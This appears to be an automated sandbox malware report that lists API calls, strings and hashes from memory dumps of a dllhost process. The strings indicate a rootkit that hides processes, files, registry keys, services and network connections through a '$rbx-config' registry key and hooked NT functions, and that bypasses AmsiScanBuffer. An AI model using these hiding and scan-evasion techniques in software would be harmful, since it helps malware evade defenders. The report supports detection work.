Part of subcall function 000001EF092212B8: lstrlenW.KERNEL32 ref: 000001EF0922141D
Part of subcall function 000001EF092212B8: GetProcessHeap.KERNEL32 ref: 000001EF0922142B
Part of subcall function 000001EF092212B8: HeapAlloc.KERNEL32 ref: 000001EF09221439

Strings

tcp_local, xrefs: 000001EF092218FA
process_names, xrefs: 000001EF09221849
paths, xrefs: 000001EF09221884
tcp_remote, xrefs: 000001EF09221935
udp, xrefs: 000001EF09221970
startup, xrefs: 000001EF092217D1
SOFTWARE\$rbx-config, xrefs: 000001EF0922178E
pid, xrefs: 000001EF0922180E
service_names, xrefs: 000001EF092218BF

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 4dde19351ee34049f8d779fc3ff97b24cdf24396a305bf39a1337de63244f78e
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: B0715E36315A9095EB10DF21E990ADC2366FBC9B88F489139FE4D53B2AEF38C556C340

Function 000001EF09421724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001EF0942172F
HeapAlloc.KERNEL32 ref: 000001EF0942173E

Part of subcall function 000001EF09421264: GetProcessHeap.KERNEL32 ref: 000001EF0942126A
Part of subcall function 000001EF09421264: HeapAlloc.KERNEL32 ref: 000001EF09421279
Part of subcall function 000001EF09421264: GetProcessHeap.KERNEL32 ref: 000001EF09421293
Part of subcall function 000001EF09421264: HeapAlloc.KERNEL32 ref: 000001EF094212A4

Part of subcall function 000001EF09421000: GetProcessHeap.KERNEL32 ref: 000001EF09421006
Part of subcall function 000001EF09421000: HeapAlloc.KERNEL32 ref: 000001EF09421015
Part of subcall function 000001EF09421000: GetProcessHeap.KERNEL32 ref: 000001EF09421028
Part of subcall function 000001EF09421000: HeapAlloc.KERNEL32 ref: 000001EF09421037

RegOpenKeyExW.ADVAPI32 ref: 000001EF094217AE
RegOpenKeyExW.ADVAPI32 ref: 000001EF094217DB
RegCloseKey.ADVAPI32 ref: 000001EF094217F5
RegOpenKeyExW.ADVAPI32 ref: 000001EF09421815
RegCloseKey.ADVAPI32 ref: 000001EF09421830
RegOpenKeyExW.ADVAPI32 ref: 000001EF09421850
RegCloseKey.ADVAPI32 ref: 000001EF0942186B
RegOpenKeyExW.ADVAPI32 ref: 000001EF0942188B
RegCloseKey.ADVAPI32 ref: 000001EF094218A6
RegOpenKeyExW.ADVAPI32 ref: 000001EF094218C6
RegCloseKey.ADVAPI32 ref: 000001EF094218E1
RegOpenKeyExW.ADVAPI32 ref: 000001EF09421901
RegCloseKey.ADVAPI32 ref: 000001EF0942191C
RegOpenKeyExW.ADVAPI32 ref: 000001EF0942193C
RegCloseKey.ADVAPI32 ref: 000001EF09421957
RegOpenKeyExW.ADVAPI32 ref: 000001EF09421977
RegCloseKey.ADVAPI32 ref: 000001EF09421992
RegCloseKey.ADVAPI32 ref: 000001EF0942199C

Part of subcall function 000001EF094212B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001EF09421315
Part of subcall function 000001EF094212B8: GetProcessHeap.KERNEL32 ref: 000001EF09421323
Part of subcall function 000001EF094212B8: HeapAlloc.KERNEL32 ref: 000001EF09421334
Part of subcall function 000001EF094212B8: RegEnumValueW.ADVAPI32 ref: 000001EF09421393
Part of subcall function 000001EF094212B8: GetProcessHeap.KERNEL32 ref: 000001EF094213DB
Part of subcall function 000001EF094212B8: HeapAlloc.KERNEL32 ref: 000001EF094213E9
Part of subcall function 000001EF094212B8: GetProcessHeap.KERNEL32 ref: 000001EF09421406
Part of subcall function 000001EF094212B8: HeapFree.KERNEL32 ref: 000001EF09421414
Part of subcall function 000001EF094212B8: lstrlenW.KERNEL32 ref: 000001EF0942141D
Part of subcall function 000001EF094212B8: GetProcessHeap.KERNEL32 ref: 000001EF0942142B
Part of subcall function 000001EF094212B8: HeapAlloc.KERNEL32 ref: 000001EF09421439

Strings

SOFTWARE\$rbx-config, xrefs: 000001EF0942178E
startup, xrefs: 000001EF094217D1
udp, xrefs: 000001EF09421970
process_names, xrefs: 000001EF09421849
paths, xrefs: 000001EF09421884
tcp_remote, xrefs: 000001EF09421935
tcp_local, xrefs: 000001EF094218FA
service_names, xrefs: 000001EF094218BF
pid, xrefs: 000001EF0942180E

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 0e49696b8e29dfe5741e136925c9c7f6352625b565788e2d784bcdf7ae6b8811
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 8471093A214AD095EB109F35E9906DC2376FBC9BACF88D129FD4D57A2AEE25C446C340

Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001527
HeapAlloc.KERNEL32 ref: 0000000140001536

Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

RegOpenKeyExW.ADVAPI32 ref: 00000001400015A6
RegOpenKeyExW.ADVAPI32 ref: 00000001400015D3
RegCloseKey.ADVAPI32 ref: 00000001400015ED
RegOpenKeyExW.ADVAPI32 ref: 000000014000160D
RegCloseKey.ADVAPI32 ref: 0000000140001628
RegOpenKeyExW.ADVAPI32 ref: 0000000140001648
RegCloseKey.ADVAPI32 ref: 0000000140001663
RegOpenKeyExW.ADVAPI32 ref: 0000000140001683
RegCloseKey.ADVAPI32 ref: 000000014000169E
RegOpenKeyExW.ADVAPI32 ref: 00000001400016BE
RegCloseKey.ADVAPI32 ref: 00000001400016D9
RegOpenKeyExW.ADVAPI32 ref: 00000001400016F9
RegCloseKey.ADVAPI32 ref: 0000000140001714
RegOpenKeyExW.ADVAPI32 ref: 0000000140001734
RegCloseKey.ADVAPI32 ref: 000000014000174F
RegOpenKeyExW.ADVAPI32 ref: 000000014000176F
RegCloseKey.ADVAPI32 ref: 000000014000178A
RegCloseKey.ADVAPI32 ref: 0000000140001794

Part of subcall function 0000000140001274: RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400012DF
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400012F0
Part of subcall function 0000000140001274: RegEnumValueW.ADVAPI32 ref: 000000014000134F
Part of subcall function 0000000140001274: StrCmpIW.SHLWAPI ref: 0000000140001388
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013C7
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400013D5
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013F2
Part of subcall function 0000000140001274: HeapFree.KERNEL32 ref: 0000000140001400

Strings

SOFTWARE\$rbx-config, xrefs: 0000000140001586
tcp_local, xrefs: 00000001400016F2
udp, xrefs: 0000000140001768
startup, xrefs: 00000001400015C9
tcp_remote, xrefs: 000000014000172D
paths, xrefs: 000000014000167C
service_names, xrefs: 00000001400016B7
pid, xrefs: 0000000140001606
process_names, xrefs: 0000000140001641

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 3993315683-3414887735
Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

Function 000001EF09221E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001EF09221E7F

Part of subcall function 000001EF092222A8: GetModuleHandleA.KERNEL32(?,?,?,000001EF09221EB1), ref: 000001EF092222C0
Part of subcall function 000001EF092222A8: GetProcAddress.KERNEL32(?,?,?,000001EF09221EB1), ref: 000001EF092222D1

CreateThread.KERNEL32 ref: 000001EF09222043
TlsAlloc.KERNEL32 ref: 000001EF09222049
TlsAlloc.KERNEL32 ref: 000001EF09222055
TlsAlloc.KERNEL32 ref: 000001EF09222061
TlsAlloc.KERNEL32 ref: 000001EF0922206D
TlsAlloc.KERNEL32 ref: 000001EF09222079
TlsAlloc.KERNEL32 ref: 000001EF09222085

Strings

EnumServicesStatusExW, xrefs: 000001EF09221F71, 000001EF09221F92
AmsiScanBuffer, xrefs: 000001EF09222012
NtEnumerateKey, xrefs: 000001EF09221F19
PdhGetRawCounterArrayW, xrefs: 000001EF09221FD0
NtQuerySystemInformation, xrefs: 000001EF09221EA5
PdhGetFormattedCounterArrayW, xrefs: 000001EF09221FF1
ntdll.dll, xrefs: 000001EF09221E8D
NtQueryDirectoryFile, xrefs: 000001EF09221EDF
sechost.dll, xrefs: 000001EF09221F99
NtEnumerateValueKey, xrefs: 000001EF09221F36
NtResumeThread, xrefs: 000001EF09221EC2
amsi.dll, xrefs: 000001EF09222019
EnumServiceGroupW, xrefs: 000001EF09221F50
NtDeviceIoControlFile, xrefs: 000001EF09221FB6
pdh.dll, xrefs: 000001EF09221FD7, 000001EF09221FF8
advapi32.dll, xrefs: 000001EF09221F57, 000001EF09221F78
NtQueryDirectoryFileEx, xrefs: 000001EF09221EFC

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: fce56665e3a5096e5c7e543e3739f5a3155f2da18290102c895d9de897cb80fa
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: EB519C70154ACAA5EB04EB64ED807DC2322ABD0744F88857FBC5912167FE7D82ABC381

Function 000001EF09421E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001EF09421E7F

Part of subcall function 000001EF094222A8: GetModuleHandleA.KERNEL32(?,?,?,000001EF09421EB1), ref: 000001EF094222C0
Part of subcall function 000001EF094222A8: GetProcAddress.KERNEL32(?,?,?,000001EF09421EB1), ref: 000001EF094222D1

CreateThread.KERNEL32 ref: 000001EF09422043
TlsAlloc.KERNEL32 ref: 000001EF09422049
TlsAlloc.KERNEL32 ref: 000001EF09422055
TlsAlloc.KERNEL32 ref: 000001EF09422061
TlsAlloc.KERNEL32 ref: 000001EF0942206D
TlsAlloc.KERNEL32 ref: 000001EF09422079
TlsAlloc.KERNEL32 ref: 000001EF09422085

Strings

pdh.dll, xrefs: 000001EF09421FD7, 000001EF09421FF8
EnumServicesStatusExW, xrefs: 000001EF09421F71, 000001EF09421F92
NtQueryDirectoryFileEx, xrefs: 000001EF09421EFC
PdhGetRawCounterArrayW, xrefs: 000001EF09421FD0
NtResumeThread, xrefs: 000001EF09421EC2
amsi.dll, xrefs: 000001EF09422019
NtDeviceIoControlFile, xrefs: 000001EF09421FB6
AmsiScanBuffer, xrefs: 000001EF09422012
EnumServiceGroupW, xrefs: 000001EF09421F50
NtQueryDirectoryFile, xrefs: 000001EF09421EDF
ntdll.dll, xrefs: 000001EF09421E8D
NtEnumerateValueKey, xrefs: 000001EF09421F36
NtQuerySystemInformation, xrefs: 000001EF09421EA5
NtEnumerateKey, xrefs: 000001EF09421F19
PdhGetFormattedCounterArrayW, xrefs: 000001EF09421FF1
sechost.dll, xrefs: 000001EF09421F99
advapi32.dll, xrefs: 000001EF09421F57, 000001EF09421F78

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: be671af5a41c3820cb1c3a35a4e93be96f5918437d6dee513164a2fbbfd816b7
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: DD51C478554AC6A1EA04DB74EDA07CC2322B7D4365FC8C43FBC5912167BEB9828BC390

Function 000001EF092212B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001EF09221315
GetProcessHeap.KERNEL32 ref: 000001EF09221323
HeapAlloc.KERNEL32 ref: 000001EF09221334
RegEnumValueW.ADVAPI32 ref: 000001EF09221393

Part of subcall function 000001EF09221530: StrCmpIW.SHLWAPI ref: 000001EF09221561

GetProcessHeap.KERNEL32 ref: 000001EF092213DB
HeapAlloc.KERNEL32 ref: 000001EF092213E9
GetProcessHeap.KERNEL32 ref: 000001EF09221406
HeapFree.KERNEL32 ref: 000001EF09221414
lstrlenW.KERNEL32 ref: 000001EF0922141D
GetProcessHeap.KERNEL32 ref: 000001EF0922142B
HeapAlloc.KERNEL32 ref: 000001EF09221439
StrCpyW.SHLWAPI ref: 000001EF0922145B
GetProcessHeap.KERNEL32 ref: 000001EF09221472
HeapFree.KERNEL32 ref: 000001EF09221480

Strings

d, xrefs: 000001EF09221356

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 8157b280c978a86e3987e94b0a740eb8e8d56a14393275f44b5f87ddd5e2c63a
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 3D513A32614B8496E724CF62E54879E77A2F7C9B98F488128EE8D07719EF3CC05AC740

Function 000001EF094212B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001EF09421315
GetProcessHeap.KERNEL32 ref: 000001EF09421323
HeapAlloc.KERNEL32 ref: 000001EF09421334
RegEnumValueW.ADVAPI32 ref: 000001EF09421393

Part of subcall function 000001EF09421530: StrCmpIW.SHLWAPI ref: 000001EF09421561

GetProcessHeap.KERNEL32 ref: 000001EF094213DB
HeapAlloc.KERNEL32 ref: 000001EF094213E9
GetProcessHeap.KERNEL32 ref: 000001EF09421406
HeapFree.KERNEL32 ref: 000001EF09421414
lstrlenW.KERNEL32 ref: 000001EF0942141D
GetProcessHeap.KERNEL32 ref: 000001EF0942142B
HeapAlloc.KERNEL32 ref: 000001EF09421439
StrCpyW.SHLWAPI ref: 000001EF0942145B
GetProcessHeap.KERNEL32 ref: 000001EF09421472
HeapFree.KERNEL32 ref: 000001EF09421480

Strings

d, xrefs: 000001EF09421356

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 03a4fd040867b9cc4c4f4c901a221fb721c0f6ab6c344da5c350f5ed1ab9e050
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 58513A36614BC496EB24CF62E54839E77A2F7C9BA8F48C128EE4907719EF3CC0468740

Function 000001EF0922EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001EF0922F34A,?,?,00000000,000001EF0922F2CD), ref: 000001EF0922EFF5
GetLastError.KERNEL32(?,?,00000000,000001EF0922F2CD), ref: 000001EF0922F007
LoadLibraryExW.KERNEL32(?,?,00000000,000001EF0922F2CD), ref: 000001EF0922F049
VirtualProtect.KERNEL32 ref: 000001EF0922F0A5
VirtualProtect.KERNEL32 ref: 000001EF0922F0D6
FreeLibrary.KERNEL32(?,?,00000000,000001EF0922F2CD), ref: 000001EF0922F11A
GetProcAddress.KERNEL32(?,?,00000000,000001EF0922F2CD), ref: 000001EF0922F126

Strings

ext-ms-, xrefs: 000001EF0922F02E
AppPolicyGetProcessTerminationMethod, xrefs: 000001EF0922F157, 000001EF0922F165
api-ms-, xrefs: 000001EF0922F01B

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 457315a2485e6d78fc157177cee4b5a0d465d6f2f406062a6a76825a3094f1be
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 50518A3170268461EE149B56EA007ED23A2AB89BB0F9C473DBE3D473D6FB38C5478640

Function 000001EF0942EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001EF0942F34A,?,?,00000000,000001EF0942F2CD), ref: 000001EF0942EFF5
GetLastError.KERNEL32(?,?,00000000,000001EF0942F2CD), ref: 000001EF0942F007
LoadLibraryExW.KERNEL32(?,?,00000000,000001EF0942F2CD), ref: 000001EF0942F049
VirtualProtect.KERNEL32 ref: 000001EF0942F0A5
VirtualProtect.KERNEL32 ref: 000001EF0942F0D6
FreeLibrary.KERNEL32(?,?,00000000,000001EF0942F2CD), ref: 000001EF0942F11A
GetProcAddress.KERNEL32(?,?,00000000,000001EF0942F2CD), ref: 000001EF0942F126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 000001EF0942F157, 000001EF0942F165
api-ms-, xrefs: 000001EF0942F01B
ext-ms-, xrefs: 000001EF0942F02E

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 349912e1a4fa7d2850ed19bfc267d7d324cc4c07f0b8daaf9d845d296e97078f
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 80518E397016C451EA149B66E9403ED22A2BB89BB4FDCC73CAE7D473D2FB39D4468640

Function 000001EF092233A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001EF092233FD
GetProcessHeap.KERNEL32 ref: 000001EF09223412
HeapAlloc.KERNEL32 ref: 000001EF09223420
PdhGetCounterInfoW.PDH ref: 000001EF09223436
StrCmpW.SHLWAPI ref: 000001EF0922344B

Part of subcall function 000001EF09223950: StrCmpNW.SHLWAPI ref: 000001EF09223972
Part of subcall function 000001EF09223950: StrStrW.SHLWAPI ref: 000001EF09223990
Part of subcall function 000001EF09223950: StrToIntW.SHLWAPI ref: 000001EF092239B7

GetProcessHeap.KERNEL32 ref: 000001EF09223488
HeapFree.KERNEL32 ref: 000001EF09223496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001EF09223444

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: c5fb552c9e61cd1e98144d0ec0c9e938c3678fa9fe6a84a545c7699448832b0e
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: F2315C32600A80A6EB21DB12E94479DA3A2F7D8F95F48457DBE4D43626EF3CC55BC740

